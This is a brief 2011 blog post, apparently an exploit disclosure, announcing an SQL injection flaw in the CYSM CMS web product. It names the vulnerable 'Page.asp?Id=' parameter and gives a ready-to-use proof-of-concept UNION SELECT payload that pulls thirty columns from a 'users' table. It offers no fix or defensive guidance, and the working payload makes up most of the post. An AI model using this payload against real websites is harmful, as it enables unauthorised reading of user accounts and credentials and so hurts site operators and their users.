Tuesday, March 1, 2011

CYSM CMS Vulnerable to SQL Injection


Title : CYSM CMS Vulnerable to SQL Injection
Web : http://www.cysm.com.mx
Found by: p0pc0rn 01/03/2011


SQL
---

http://site.com/Page.asp?Id=[SQL]

POC
---

http://site.com/Page.asp?Id=1337 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from users



thanks,
-p0pc0rn-
Share:

0 comments: